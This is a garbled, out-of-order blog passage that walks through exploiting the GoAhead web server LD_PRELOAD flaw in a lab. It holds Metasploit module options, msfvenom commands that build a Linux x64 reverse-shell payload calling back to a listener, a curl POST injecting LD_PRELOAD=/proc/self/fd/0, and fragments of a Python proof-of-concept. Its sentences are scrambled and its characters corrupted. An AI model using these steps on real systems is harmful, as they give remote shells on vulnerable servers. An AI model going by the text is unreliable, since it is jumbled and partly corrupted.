LHOST 192.168.92.134 yes The listen address (an interface may be specified) Payload options (linux/圆4/shell_reverse_tcp): TARGET_URI no The path to a CGI script on the GoAhead server
SSL false no Negotiate SSL/TLS for outgoing connections RHOSTS 192.168.92.153 yes The target address range or CIDR identifier Proxies no A proxy chain of format type:host:port Name Current Setting Required Description Module options (exploit/linux/http/goahead_ldpreload): So how does the Metasploit module differ? First let’s look at a demo of the Metasploit exploit in action msf5 exploit(linux/http/goahead_ldpreload) > options
#Eng liveview cgi how to#
There’s another standalone Python exploit here which may work if you can figure out what it says and how to use it (it’s in Chinese). Help='list of cgi filenames to brute force (defaults to stdin)')įor cginame in ():Ĭonn = httplib.HTTPConnection(, )Ĭonn.request("GET", "/cgi-bin/" + cginame) Type=argparse.FileType('r'), default=sys.stdin, 'findcgi', help='brute force cgi script names')įindcgi.add_argument('-wordlist', nargs='?', This was also when I noticed that the POC exploit by the original author had a findcgi function, it required the user to specify a wordlist to bruteforce search for the CGI endpoint or enter it manually via stdin makemyday.py -server 192.168.92.153 -port 8080 exploit -payload payload.soĪnd the successful way of using the EDB-verified exploit. payload shared object file to execute (defaults to. h, -help show this help message and exit Int (*ret)() = Web Server# gcc -shared -fPIC payload.c -o. Unsigned char buf Web Server# cat payload.c Socket.timeout: timed Web Server# msfvenom -platform linux -a 圆4 -p linux/圆4/shell_reverse_tcp LHOST=192.168.92.134 LPORT=4444 -f cNo encoder or badchars specified, outputting raw payload Tid = threading.Thread(self.do_exploit(verify,))įile "./makemyday.py", line 169, in do_exploitįile "/usr/lib/python2.7/httplib.py", line 821, in connectįile "/usr/lib/python2.7/socket.py", line 575, in create_connection
Here are my unsuccessful attempts with the POC makemyday.py before I understood what was going on. Incidentally this also applies to the Tiki Wiki’s 3rd party module vulnerability, but I guess Tiki Wiki standardises it. Yeah curl assumes you know the endpoint is at the path /cgi-bin/index which may not actually be the case Vulhub tells us it’s there. There’s a really complicated explanation of the vulnerability here you can read if interested. So why bother with a script when a one-liner suffices? I realised that although there was a POC script exploit (by the author which discovered the vulnerability) which is Exploit-DB verified or the Github repo doesn’t actually search for the cgi-bin endpoint for you. This is what a successful reverse shell with curl looks like in Wireshark: POST /cgi-bin/index?LD_PRELOAD=/proc/self/fd/0 HTTP/1.1 # msfvenom -a 圆4 -platform Linux -p linux/圆4/shell_reverse_tcp LHOST=192.168.92.134 LPORT=4444 -f elf-so -o payload.so
0 kommentar(er)
